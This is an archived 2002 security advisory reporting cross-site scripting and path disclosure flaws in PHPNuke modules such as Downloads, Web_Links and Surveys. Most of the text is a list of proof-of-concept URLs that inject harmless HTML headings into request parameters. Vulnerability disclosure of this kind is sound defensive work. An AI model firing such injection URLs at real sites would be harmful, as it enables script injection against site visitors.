TUCoPS :: Web :: PHP :: web5307.htm

PHPNuke - Multiple cross site scripting and path discovery bugs
24th Apr 2002 [SBWID-5307]
COMMAND

	Multiple cross site scripting and path discovery bugs in PHPNuke

SYSTEMS AFFECTED

	??

PROBLEM

	Rodrigo Gutierrez [http://www.trustix.com] posted  following  URL\'s  as
	holding XSS & path discovery bugs :
	

	http://nuke/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=%22%3Ch1%3EI%20Love%20XSS%3C/h1%3E

	http://nuke/modules.php?name=Classifieds&op=ViewAds&id_catg=%22%3Ch1%3ESmelly%20socks%20category%3C/h1%3E&id_subcatg=75

	http://nuke/modules.php?op=modload&name=Guestbook&file=index&entry=%22%3Ch1%3Etest%3C/h1%3E

	http://nuke/modules.php?name=Your_Account&op=userinfo&uname=%22%3Ch1%3Etest%20123%3C/h1%3E

	http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=Replugge%20Love%20PHPNuke%20

	http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=Love%20this&month=3&month_l=Replugge

	http://nuke/modules.php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E

	http://nuke/modules.php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3EBugger%20You%3C/h1%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownload

	http://nuke/modules.php?name=Downloads&d_op=viewdownload&%22%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=

	http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here

	http://nuke/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E

	http://nuke/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3C/h1%3E

	

	

SOLUTION

	None yet ?

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH